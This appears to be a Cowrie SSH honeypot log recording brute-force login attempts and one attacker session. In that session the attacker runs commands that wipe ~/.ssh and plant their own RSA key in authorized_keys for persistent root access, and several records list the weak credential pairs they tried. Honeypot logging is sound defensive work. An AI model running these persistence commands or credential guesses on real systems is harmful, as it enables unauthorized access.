{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.617106Z","src_ip":"185.255.91.51","session":"9c76d3cc93e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.714119Z","src_ip":"185.255.91.51","session":"9c76d3cc93e2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:48:13.110305Z","src_ip":"185.255.91.51","session":"9c76d3cc93e2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:14.218210Z","src_ip":"185.255.91.51","session":"9c76d3cc93e2"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":36930,"dst_ip":"1.2.3.4","dst_port":22,"session":"a40e158c10d3","protocol":"ssh","message":"New connection: 185.255.91.51:36930 (1.2.3.4:22) [session: a40e158c10d3]","sensor":"my-vps","timestamp":"2025-09-08T14:48:14.307792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:48:14.313891Z","src_ip":"185.255.91.51","session":"a40e158c10d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:48:14.406904Z","src_ip":"185.255.91.51","session":"a40e158c10d3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:48:14.784897Z","src_ip":"185.255.91.51","session":"a40e158c10d3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:14.883598Z","src_ip":"185.255.91.51","session":"a40e158c10d3"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:14.887678Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.session.closed","duration":31.294517278671265,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:32.369534Z","src_ip":"212.227.235.229","session":"d9e4c1ee6e16"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53788,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1280716cff3","protocol":"ssh","message":"New connection: 217.72.205.35:53788 (1.2.3.4:22) [session: d1280716cff3]","sensor":"my-vps","timestamp":"2025-09-08T14:48:36.880306Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:36.881390Z","src_ip":"217.72.205.35","session":"d1280716cff3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44518,"dst_ip":"1.2.3.4","dst_port":22,"session":"3741fa8de977","protocol":"ssh","message":"New connection: 212.227.235.229:44518 (1.2.3.4:22) [session: 3741fa8de977]","sensor":"my-vps","timestamp":"2025-09-08T14:48:41.046864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:48:41.047824Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:48:41.170010Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.login.success","username":"root","password":"12345qwer","message":"login attempt [root/12345qwer] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:48:41.701136Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:48:41.972162Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:48:41.973150Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:48:41.974735Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:42.099731Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:48:42.446616Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:48:42.447361Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:48:42.571613Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:42.572510Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44530,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1e464674e5e","protocol":"ssh","message":"New connection: 212.227.235.229:44530 (1.2.3.4:22) [session: f1e464674e5e]","sensor":"my-vps","timestamp":"2025-09-08T14:48:42.690040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:48:42.690887Z","src_ip":"212.227.235.229","session":"f1e464674e5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:48:42.810370Z","src_ip":"212.227.235.229","session":"f1e464674e5e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:48:43.328547Z","src_ip":"212.227.235.229","session":"f1e464674e5e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:44.450294Z","src_ip":"212.227.235.229","session":"f1e464674e5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44540,"dst_ip":"1.2.3.4","dst_port":22,"session":"40e606dd000e","protocol":"ssh","message":"New connection: 212.227.235.229:44540 (1.2.3.4:22) [session: 40e606dd000e]","sensor":"my-vps","timestamp":"2025-09-08T14:48:44.572859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:48:44.573742Z","src_ip":"212.227.235.229","session":"40e606dd000e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:48:44.696202Z","src_ip":"212.227.235.229","session":"40e606dd000e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:48:45.230134Z","src_ip":"212.227.235.229","session":"40e606dd000e"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:45.355128Z","src_ip":"212.227.235.229","session":"3741fa8de977"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:45.356530Z","src_ip":"212.227.235.229","session":"40e606dd000e"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":56906,"dst_ip":"1.2.3.4","dst_port":22,"session":"5aac773895ca","protocol":"ssh","message":"New connection: 158.51.124.56:56906 (1.2.3.4:22) [session: 5aac773895ca]","sensor":"my-vps","timestamp":"2025-09-08T14:48:55.061649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:48:55.062305Z","src_ip":"158.51.124.56","session":"5aac773895ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:48:55.201518Z","src_ip":"158.51.124.56","session":"5aac773895ca"}
{"eventid":"cowrie.login.failed","username":"stack","password":"password","message":"login attempt [stack/password] failed","sensor":"my-vps","timestamp":"2025-09-08T14:48:55.801432Z","src_ip":"158.51.124.56","session":"5aac773895ca"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:56.943040Z","src_ip":"158.51.124.56","session":"5aac773895ca"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:49:06.513202Z","src_ip":"212.227.125.160","session":"f5d588df4843"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":51348,"dst_ip":"1.2.3.4","dst_port":22,"session":"5396e6a0f149","protocol":"ssh","message":"New connection: 185.255.91.51:51348 (1.2.3.4:22) [session: 5396e6a0f149]","sensor":"my-vps","timestamp":"2025-09-08T14:49:19.491025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:49:19.491997Z","src_ip":"185.255.91.51","session":"5396e6a0f149"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:49:19.592454Z","src_ip":"185.255.91.51","session":"5396e6a0f149"}
{"eventid":"cowrie.login.failed","username":"slave","password":"password","message":"login attempt [slave/password] failed","sensor":"my-vps","timestamp":"2025-09-08T14:49:20.013164Z","src_ip":"185.255.91.51","session":"5396e6a0f149"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:49:21.109189Z","src_ip":"185.255.91.51","session":"5396e6a0f149"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46356,"dst_ip":"1.2.3.4","dst_port":22,"session":"a914cd56fa86","protocol":"ssh","message":"New connection: 212.227.235.229:46356 (1.2.3.4:22) [session: a914cd56fa86]","sensor":"my-vps","timestamp":"2025-09-08T14:49:46.482502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:49:46.484002Z","src_ip":"212.227.235.229","session":"a914cd56fa86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:49:46.606925Z","src_ip":"212.227.235.229","session":"a914cd56fa86"}
{"eventid":"cowrie.login.failed","username":"butter","password":"butter123","message":"login attempt [butter/butter123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:49:47.138474Z","src_ip":"212.227.235.229","session":"a914cd56fa86"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:49:48.262830Z","src_ip":"212.227.235.229","session":"a914cd56fa86"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":54464,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a85f553b0be","protocol":"ssh","message":"New connection: 158.51.124.56:54464 (1.2.3.4:22) [session: 1a85f553b0be]","sensor":"my-vps","timestamp":"2025-09-08T14:49:55.034682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:49:55.035569Z","src_ip":"158.51.124.56","session":"1a85f553b0be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@